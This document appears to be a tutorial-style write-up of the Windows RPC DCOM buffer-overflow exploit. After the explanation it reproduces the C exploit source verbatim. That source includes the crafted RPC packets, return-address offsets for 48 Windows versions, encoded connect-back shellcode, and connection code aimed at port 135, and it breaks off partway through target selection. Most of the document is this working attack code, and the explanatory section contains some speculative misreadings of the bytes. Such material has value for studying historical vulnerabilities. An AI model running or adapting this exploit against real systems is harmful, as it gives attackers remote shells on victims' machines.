Understanding the 'RPC DCOM' Remote Exploit (Paper ID 70)

What this paper is

This paper describes a remote exploit for Microsoft Windows systems that targets the Distributed Component Object Model (DCOM) protocol, which is often exposed via RPC (Remote Procedure Call). The exploit aims to gain remote code execution on a vulnerable system by sending specially crafted network packets. The paper provides a C code exploit that lists 48 different target operating system versions and service pack combinations, indicating a broad range of potential vulnerabilities.

Simple technical breakdown

The exploit works by sending a series of malformed DCOM/RPC requests to a target Windows machine. These requests are designed to trigger a buffer overflow vulnerability within the DCOM service. When the overflow occurs, it overwrites critical memory locations, allowing the attacker to redirect the program's execution flow to a payload (shellcode) that is also sent as part of the exploit. This shellcode then executes on the target system, typically establishing a connection back to the attacker's machine.

The exploit leverages the fact that DCOM can be used to remotely activate and interact with COM objects. By sending specific sequences of DCOM calls, the attacker manipulates the internal state of the DCOM service, leading to the vulnerability. The exploit code includes various "offsets" which are essentially specific memory addresses or data patterns that are unique to different versions and configurations of Windows. These offsets are crucial for precisely overwriting the return address on the stack to point to the attacker's shellcode.

Complete code and payload walkthrough

The provided C code is a network-based exploit that uses Winsock for network communication.

Key components:

Includes and Pragmas:
- stdio.h, stdlib.h, windows.h: Standard C libraries for input/output, general utilities, and Windows API access.
- #pragma comment(lib,"ws2_32"): Links the Winsock 2.0 library, essential for network programming on Windows.
- #define DWORD unsigned long: Defines DWORD as a 32-bit unsigned integer, common in Windows programming.
- WSADATA wsa;: A structure to hold Windows Sockets initialization data.
bindstr[]:
- This byte array likely represents a specific DCOM/RPC binding string or a part of a DCOM message. It's a sequence of raw bytes that the exploit sends to initiate communication or identify a service. Without more context or symbol names, its exact purpose within the DCOM handshake is hard to determine definitively, but it's a crucial part of the initial network traffic.
request1[]:
- This is a large byte array representing a complex DCOM/RPC request. It's the primary data packet sent to the target.
- It contains various fields typical of RPC/DCOM:
  - Opcode/Function codes.
  - Interface identifiers (GUIDs).
  - Object identifiers.
  - Data structures that likely describe the COM object being invoked and its methods.
- Crucially, this request is crafted to trigger the buffer overflow. The 0xCC bytes (INT 3, breakpoint) within request4 (explained later) are often used as placeholders or debugging markers, but here they appear within request1 as well, suggesting they might be part of the overflowed data or padding.
- Practical Purpose: This is the core exploit payload data that is sent over the network to the target's DCOM endpoint. It's designed to exploit a specific vulnerability.
request2[] and request3[]:
- request2: A smaller byte sequence, likely part of the DCOM/RPC communication. It might represent a specific command or data segment within the overall interaction.
- request3: Another byte sequence. The presence of 0x5C,0x00,0x43,0x00,0x24,0x00 (\, C, $, \) suggests it might be related to path manipulation or UNC paths (\\C$\...). This could be used to specify a target path for file operations or to interact with specific system resources.
- Practical Purpose: These likely form parts of the DCOM/RPC message sequence, potentially used to set up the context for the exploit or to specify targets for the shellcode.
Target Offsets (winntsp4eng, winntsp5cn, etc.):
- These are arrays of 4-byte hexadecimal values.
- Each array represents a specific "offset" or "pointer" that is unique to a particular version and language/service pack of Windows.
- These offsets are critical for the exploit to correctly overwrite the return address on the stack. The exploit code dynamically selects and injects one of these offsets into the shellcode based on the target specified by the user.
- Practical Purpose: These are hardcoded addresses or relative offsets that point to specific locations in the vulnerable process's memory. They are used to ensure the shellcode is placed correctly and that the program flow is redirected to it.
Shellcode (sc[]):
- This is the actual payload that will be executed on the target machine. It's a sequence of machine code instructions.
- The shellcode is designed to:
  - Stage 1 (Setup): Likely sets up the environment, possibly resolves necessary API functions, and prepares for the next stage. The initial bytes \x46\x00\x58\x00\x4E\x00\x42\x00 are unusual for typical x86 shellcode and might indicate a different architecture or a custom encoding. However, the later bytes like \xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff are common shellcode patterns for jumping to another section of code.
  - Stage 2 (Target Offset Injection): The memcpy(sc+36, ..., sizeof(...)) lines in main are crucial. They take the selected target offset (e.g., winntsp4eng) and copy it into the sc buffer at a specific location (offset 36). This means the shellcode itself is designed to be patched with the correct target offset.
  - Stage 3 (Exploitation Logic): The bulk of the shellcode, starting with \x7b\xe4\x93\x93..., contains the actual instructions to be executed. This part is heavily obfuscated and uses a lot of non-standard byte sequences, likely for evasion or to fit within specific buffer constraints. It's highly probable that this section contains code to:
    - Establish a network connection back to the attacker (connect-back shell).
    - Spawn a command shell (cmd.exe).
    - Redirect standard input, output, and error streams to the network socket.
  - The \xCC\xCC\xCC\xCC bytes in request4 are often used as "NOP" (No Operation) instructions or as fill bytes. In this context, they might be used to pad the buffer to a specific size or to ensure that if the overflow occurs at a certain point, execution continues safely until the shellcode.
- Practical Purpose: This is the malicious code that the attacker wants to run on the victim machine. It's designed to be small, self-contained, and to establish a reverse shell.
request4[]:
- Another byte array, likely part of the DCOM/RPC interaction. The 0xCC bytes are prominent here.
- Practical Purpose: This request might be used to finalize the exploit sequence or to provide specific data that, when combined with the overflow, leads to shellcode execution. The 0xCC bytes could be padding or specific values that trigger the overflow condition.
main function:
- Initialization: Starts Winsock.
- Usage Message: Prints help information if the correct number of command-line arguments is not provided.
- Argument Parsing: Expects <victim IP>, <connectback IP>, <connectback port>, and <target number>.
- Network Setup:
  - Uses gethostbyname to resolve the victim's IP address.
  - Creates a TCP socket (SOCK_STREAM).
  - Connects to the victim on port 135 (the standard RPC/DCOM endpoint mapper port).
- Target Selection: Based on the argv[4] (target number), it selects the appropriate offset array (e.g., winntsp4eng) and copies it into the sc (shellcode) buffer at offset 36. This is the patching step.
- Exploit Execution:
  - It constructs buf1 and buf2 by concatenating various request arrays. The exact composition and order are critical for the exploit to work.
  - It sends these constructed buffers to the victim via the established socket.
  - The code snippet provided is truncated, but it would typically involve sending request1, request2, request3, request4, and the patched sc in a specific sequence.
- send() and recv(): (Implied, as the code is truncated) These functions would be used to send the exploit data and potentially receive any response from the target.
- closesocket() and WSACleanup(): Cleans up network resources.

Mapping of code fragments to practical purpose:

| Code Fragment/Block | Practical Purpose

Original Exploit-DB Content (Verbatim)

//////////////////////////////////////////////////////////////////////////
//
//   Windows RPC DCOM Remote Exploit with 48 TARGETS (Fixed)
//
//////////////////////////////////////////////////////////////////////////
// 
//            English - French - Chinese - Polish - German
//              Japanese - Korean - Mexican - Kenyan
//
//          Tks to all wolrd wide contributors (Public Property)
// 
//                 New Targets ? contrib@k-otik.com 
//
//////////////////////////////////////////////////////////////////////////



#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")

#define DWORD unsigned long
WSADATA wsa;

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};



/* Myam add OFFSETS*/

char winntsp4eng[] = "\xe5\x27\xf3\x77"; /* English winNT sp4 */
char winntsp5cn[] = "\xcf\xda\xee\x77"; /* china winNT sp5 */
char winntsp6cn[] = "\xac\x0e\xf0\x77"; /* china winNT sp6 */
char winntsp6acn[] = "\xc3\xea\xf0\x77"; /* china NT sp6a */
char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
char win2knospchi[] = "\x2a\xe3\xe2\x77"; /* china win2k nosp */
char win2ksp1chi[] = "\x8b\x89\xe6\x77"; /* china win2k sp1 */
char win2ksp2chi[] = "\x2b\x49\xe0\x77"; /* china win2k sp2 */
char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
char win2knospjap[] = "\xe5\x27\xf3\x77"; /* Japanese win2k nosp */
char win2ksp1jap[] = "\x8b\x89\xe5\x77"; /* Japanese win2k sp1 */
char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
char win2knospkr[] = "\x2a\xe3\xe1\x77"; /* Korea win2k nosp */
char win2ksp1kr[] = "\x8b\x89\xe5\x77"; /* Korea win2k sp1 same offset as win2kjp_sp1 ??*/
char win2ksp2kr[] = "\x2b\x49\xdf\x77"; /* Korea win2k sp2 */
char win2knospmx[] = "\x2a\xe3\xe1\x77"; /* Mexican win2k nosp */
char win2ksp1mx[] = "\x8b\x89\xe8\x77"; /* Mexican win2k sp1 */
char win2knospken[] = "\x4d\x3f\xe3\x77"; /* Kenya win2k sp1 */
char win2ksp1ken[] = "\x8b\x89\xe8\x77"; /* Kenya win2k sp1 */
char win2ksp2ken[] = "\x2b\x49\xe2\x77"; /* Kenya win2k sp1 */
char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */
char win2k3nospeng[] = "\xb0\x54\x22\x77"; /* english win2k3 */
char Win2ksp3ger[] = "\x29\x2c\xe3\x77"; /* Germanh win2 sp3 */
char Win2ksp4ger1[] = "\x29\x4c\xe0\x77"; /* German win2 sp4 1 */
char Win2ksp4ger2[] = "\x56\xc2\xe2\x77"; /* German win2 sp4 2 */
char winxpsp1ger[] = "\xfc\x18\xd4\x77"; /* German xp sp1 */
char Win2ksp1fr[] = "\x4b\x3e\xe4\x77"; /* French win2k Server SP1 */
char Win2ksp4fr[] = "\x56\xc2\xe2\x77"; /* French win2k Server SP4 */
char winxpsp0fr[] = "\x4a\x75\xd4\x77"; /* French win xp no sp */
char winxpsp1fr[] = "\xfc\x18\xd4\x77"; /* French win xp sp 1 */
char win2ksp3big[] = "\x25\x2b\xaa\x77";
char win2ksp4big[] = "\x29\x4c\xdf\x77";
char winxpsp01big[] = "\xfb\x7b\xa1\x71";



/* Test this offset
( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
Windows 2000 (no-service-pack) English 0x77e33f6d
0x77f92a9b
0x77e2afc5
0x772254b0 win2k3
0x77E829E3 / 0x77E83587 kokanin win2k sp3
*/ 
unsigned char sc[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"


"\x29\x4c\xdf\x77" //sp4
//"\x29\x2c\xe2\x77"//0x77e22c29


"\x38\x6e\x16\x76\x0d\x6e\x16\x76" //??????????


"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
"\x93\x40\xe2\xfa"
// code 
"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

int main(int argc,char ** argv)
{

int len, len1, sockfd;
short port=135;
struct hostent *he;
struct sockaddr_in their_addr;


unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short port1;


DWORD cb;


WSAStartup(MAKEWORD(2,0),&wsa);


printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n");
printf("RPC DCOM Remote Exploit modified by www.k-otiK.com ;>\n");


if(argc<5)
{

printf("[<$>] RPC Remote Windows Exploit\n");
printf("[<$>] Modified by www.k-otiK.com - New Exploits Database\n");
printf("[<$>] Thanks to b@digitalwaste.org + Jørgen_Haaø + woutiir \n");
printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]);
printf("[<$>] On connect back nc -lp cbport\n");
printf("[<$>] Targets: 0 WinNT English +sp4\n");
printf("[<$>] 1 WinNT China +sp5\n");
printf("[<$>] 2 WinNT China +sp6\n");
printf("[<$>] 3 WinNT China +sp6a\n");
printf("[<$>] 4 Win2k Polish nosp ver 5.00.2195\n");
printf("[<$>] 5 Win2k Polish +sp3 ver 5.00.2195\n");
printf("[<$>] 6 Win2k Spanish +sp4\n");
printf("[<$>] 7 Win2k English nosp 1\n");
printf("[<$>] 8 Win2k English nosp 2\n");
printf("[<$>] 9 Win2k English +sp1\n");
printf("[<$>] 10 Win2k English +sp2 1\n");
printf("[<$>] 11 Win2k English +sp2 2\n");
printf("[<$>] 12 Win2k English +sp3 1\n");
printf("[<$>] 13 Win2k English +sp3 2\n");
printf("[<$>] 14 Win2k English +sp4\n");
printf("[<$>] 15 Win2k China nosp\n");
printf("[<$>] 16 Win2k China +sp1\n");
printf("[<$>] 17 Win2k China +sp2\n");
printf("[<$>] 18 Win2k China +sp3\n");
printf("[<$>] 19 Win2k China +sp4\n");
printf("[<$>] 20 Win2k German +sp3\n");
printf("[<$>] 21 Win2k Japanese nosp\n");
printf("[<$>] 22 Win2k Japanese +sp1\n");
printf("[<$>] 23 Win2k Japanese +sp2\n");
printf("[<$>] 24 Win2k Korea nosp\n");
printf("[<$>] 25 Win2k Korea +sp1\n");
printf("[<$>] 26 Win2k Korea +sp2\n");
printf("[<$>] 27 Win2k Mexican nosp\n");
printf("[<$>] 28 Win2k Mexican +sp1\n");
printf("[<$>] 29 Win2k Kenya nosp\n");
printf("[<$>] 30 Win2k Kenya +sp1\n");
printf("[<$>] 31 Win2k Kenya +sp2\n");
printf("[<$>] 32 WinXP English nosp ver 5.1.2600\n");
printf("[<$>] 33 WinXP English +sp1 1\n");
printf("[<$>] 34 WinXP English +sp1 2\n");
printf("[<$>] 35 WinXP English +sp2\n");
printf("[<$>] 36 Win2k3 English nosp\n");
printf("[<$>] 37 Win2k german sp3\n");
printf("[<$>] 38 Win2k german sp4\n");
printf("[<$>] 39 Win2k german sp4 2\n");
printf("[<$>] 40 Winxp german sp1 2\n");
printf("[<$>] 41 Win2k french sp1\n");
printf("[<$>] 42 Win2k french sp4\n");
printf("[<$>] 43 Winxp french sp0\n");
printf("[<$>] 44 Winxp french sp1\n");
printf("[<$>] 45 Win2k big5 sp3\n");
printf("[<$>] 46 Win2k big5 sp4\n");
printf("[<$>] 47 Winxp big5 sp0\n");


exit(1);
}


if ((he=gethostbyname(argv[1])) == NULL) { // get the host info

perror("gethostbyname");

exit(1);

}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

perror("socket");

exit(1);

}


their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);


if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct 
sockaddr)) == -1) {
printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);

exit(1);
}



if(atoi(argv[4])==0)

memcpy(sc+36,winntsp4eng,sizeof(winntsp4eng));
else if (atoi(argv[4])==1)
memcpy(sc+36,winntsp5cn,sizeof(winntsp5cn));
else if (atoi(argv[4])==2)
memcpy(sc+36,winntsp6cn,sizeof(winntsp6cn));
else if (atoi(argv[4])==3)
memcpy(sc+36,winntsp6acn,sizeof(winntsp6acn));
else if (atoi(argv[4])==4)
memcpy(sc+36,win2knosppl,sizeof(win2knosppl));
else if (atoi(argv[4])==5)
memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl));
else if (atoi(argv[4])==6)
memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp));
else if (atoi(argv[4])==7)
memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1));
else if (atoi(argv[4])==8)
memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2));
else if (atoi(argv[4])==9)
memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng));
else if (atoi(argv[4])==10)
memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1));
else if (atoi(argv[4])==11)
memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2));
else if (atoi(argv[4])==12)
memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1));
else if (atoi(argv[4])==13)
memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2));
else if (atoi(argv[4])==14)
memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng));
else if (atoi(argv[4])==15)
memcpy(sc+36,win2knospchi,sizeof(win2knospchi));
else if (atoi(argv[4])==16)
memcpy(sc+36,win2ksp1chi,sizeof(win2ksp1chi));
else if (atoi(argv[4])==17)
memcpy(sc+36,win2ksp2chi,sizeof(win2ksp2chi));
else if (atoi(argv[4])==18)
memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi));
else if (atoi(argv[4])==19)
memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi));
else if (atoi(argv[4])==20)
memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger));
else if (atoi(argv[4])==21)
memcpy(sc+36,win2knospjap,sizeof(win2knospjap));
else if (atoi(argv[4])==22)
memcpy(sc+36,win2ksp1jap,sizeof(win2ksp1jap));
else if (atoi(argv[4])==23)
memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap));
else if (atoi(argv[4])==24)
memcpy(sc+36,win2knospkr,sizeof(win2knospkr));
